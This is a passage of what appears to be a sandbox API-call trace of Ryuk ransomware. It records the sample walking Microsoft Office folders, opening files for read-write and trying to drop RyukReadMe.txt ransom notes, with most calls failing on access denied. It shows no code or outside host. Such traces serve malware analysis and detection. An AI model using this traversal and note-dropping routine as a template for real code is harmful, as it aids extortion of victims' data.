(hObject=0xffffffffffffffff) returned 0 [0137.391] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.391] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.391] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.391] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.391] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.391] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.391] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\IPIRM.XML", dwFileAttributes=0x80) returned 0 [0137.391] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\IPIRM.XML" (normalized: "c:\\program files\\microsoft office\\office14\\ipirm.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.391] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.391] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.391] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.391] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.392] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\IPIRMV.XML", dwFileAttributes=0x80) returned 0 [0137.392] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\IPIRMV.XML" (normalized: "c:\\program files\\microsoft office\\office14\\ipirmv.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.392] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.392] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.393] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.393] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.393] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.393] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\IXACS.PDL", dwFileAttributes=0x80) returned 0 [0137.393] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\IXACS.PDL" (normalized: "c:\\program files\\microsoft office\\office14\\ixacs.pdl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.393] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.393] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.393] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.393] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.393] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\IXDB2.PDL", dwFileAttributes=0x80) returned 0 [0137.394] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\IXDB2.PDL" (normalized: "c:\\program files\\microsoft office\\office14\\ixdb2.pdl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.394] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.394] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.394] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.394] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.394] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\IXGENERC.PDL", dwFileAttributes=0x80) returned 0 [0137.394] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\IXGENERC.PDL" (normalized: "c:\\program files\\microsoft office\\office14\\ixgenerc.pdl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.395] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.395] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.395] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.395] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.395] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\IXOLEDB.PDL", dwFileAttributes=0x80) returned 0 [0137.395] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\IXOLEDB.PDL" (normalized: "c:\\program files\\microsoft office\\office14\\ixoledb.pdl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.395] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.395] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.395] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.395] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.395] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\IXORACLE.PDL", dwFileAttributes=0x80) returned 0 [0137.396] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\IXORACLE.PDL" (normalized: "c:\\program files\\microsoft office\\office14\\ixoracle.pdl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.396] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.396] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.396] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.396] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.396] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\IXSSRV.PDL", dwFileAttributes=0x80) returned 0 [0137.396] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\IXSSRV.PDL" (normalized: "c:\\program files\\microsoft office\\office14\\ixssrv.pdl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.396] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.396] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.396] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.396] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.396] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.397] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\JFONT.DAT", dwFileAttributes=0x80) returned 0 [0137.397] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\JFONT.DAT" (normalized: "c:\\program files\\microsoft office\\office14\\jfont.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.397] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.397] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.397] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.397] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.397] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\LATIN1.SHP", dwFileAttributes=0x80) returned 0 [0137.397] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\LATIN1.SHP" (normalized: "c:\\program files\\microsoft office\\office14\\latin1.shp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.397] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.397] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.398] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.398] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.398] SetLastError (dwErrCode=0x0) [0137.398] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.398] GetLastError () returned 0x5 [0137.398] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0137.398] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.398] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Library\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2d00 [0137.399] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.399] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.399] SetLastError (dwErrCode=0x0) [0137.399] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Library\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\library\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.399] GetLastError () returned 0x5 [0137.399] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0137.399] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.399] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Library\\Analysis\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2d60 [0137.401] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.401] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.401] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.401] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Library\\Analysis\\ANALYS32.XLL", dwFileAttributes=0x80) returned 0 [0137.401] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Library\\Analysis\\ANALYS32.XLL" (normalized: "c:\\program files\\microsoft office\\office14\\library\\analysis\\analys32.xll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.401] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.401] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.401] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.401] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.401] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Library\\Analysis\\ATPVBAEN.XLAM", dwFileAttributes=0x80) returned 0 [0137.401] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Library\\Analysis\\ATPVBAEN.XLAM" (normalized: "c:\\program files\\microsoft office\\office14\\library\\analysis\\atpvbaen.xlam"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.402] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.402] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.402] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.402] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.402] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Library\\Analysis\\FUNCRES.XLAM", dwFileAttributes=0x80) returned 0 [0137.403] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Library\\Analysis\\FUNCRES.XLAM" (normalized: "c:\\program files\\microsoft office\\office14\\library\\analysis\\funcres.xlam"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.403] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.403] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.403] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.403] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.403] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Library\\Analysis\\PROCDB.XLAM", dwFileAttributes=0x80) returned 0 [0137.403] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Library\\Analysis\\PROCDB.XLAM" (normalized: "c:\\program files\\microsoft office\\office14\\library\\analysis\\procdb.xlam"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.404] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.404] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.404] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0137.404] FindClose (in: hFindFile=0x3a2d60 | out: hFindFile=0x3a2d60) returned 1 [0137.404] SetLastError (dwErrCode=0x0) [0137.404] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Library\\Analysis\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\library\\analysis\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.407] GetLastError () returned 0x5 [0137.407] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0137.407] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.407] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.407] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.407] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Library\\EUROTOOL.XLAM", dwFileAttributes=0x80) returned 0 [0137.407] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Library\\EUROTOOL.XLAM" (normalized: "c:\\program files\\microsoft office\\office14\\library\\eurotool.xlam"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.407] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.407] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.408] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.408] SetLastError (dwErrCode=0x0) [0137.408] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Library\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\library\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.408] GetLastError () returned 0x5 [0137.408] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0137.408] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.408] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Library\\SOLVER\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2d60 [0137.408] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.408] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.408] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.408] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Library\\SOLVER\\SOLVER.XLAM", dwFileAttributes=0x80) returned 0 [0137.408] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Library\\SOLVER\\SOLVER.XLAM" (normalized: "c:\\program files\\microsoft office\\office14\\library\\solver\\solver.xlam"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.408] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.409] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.409] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.409] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0137.409] FindClose (in: hFindFile=0x3a2d60 | out: hFindFile=0x3a2d60) returned 1 [0137.409] SetLastError (dwErrCode=0x0) [0137.409] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Library\\SOLVER\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\library\\solver\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.409] GetLastError () returned 0x5 [0137.409] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0137.409] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.409] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0137.409] FindClose (in: hFindFile=0x3a2d00 | out: hFindFile=0x3a2d00) returned 1 [0137.409] SetLastError (dwErrCode=0x0) [0137.409] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Library\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\library\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.409] GetLastError () returned 0x5 [0137.409] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0137.409] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.409] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.409] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.409] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.410] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\LOGMODEL.MDL", dwFileAttributes=0x80) returned 0 [0137.410] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\LOGMODEL.MDL" (normalized: "c:\\program files\\microsoft office\\office14\\logmodel.mdl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.410] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.410] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.410] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.413] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.413] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.414] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\LOOKUP.DAT", dwFileAttributes=0x80) returned 0 [0137.414] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\LOOKUP.DAT" (normalized: "c:\\program files\\microsoft office\\office14\\lookup.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.414] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.414] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.414] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.414] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.415] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.415] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.415] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.415] SetLastError (dwErrCode=0x0) [0137.415] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.415] GetLastError () returned 0x5 [0137.415] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0137.415] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.415] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\MEDIA\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2d00 [0137.417] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.417] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.417] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.417] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\MEDIA\\APPLAUSE.WAV", dwFileAttributes=0x80) returned 0 [0137.417] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\MEDIA\\APPLAUSE.WAV" (normalized: "c:\\program files\\microsoft office\\office14\\media\\applause.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.418] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.418] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.418] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.418] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.418] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\MEDIA\\ARROW.WAV", dwFileAttributes=0x80) returned 0 [0137.418] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\MEDIA\\ARROW.WAV" (normalized: "c:\\program files\\microsoft office\\office14\\media\\arrow.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.418] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.418] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.418] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.418] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 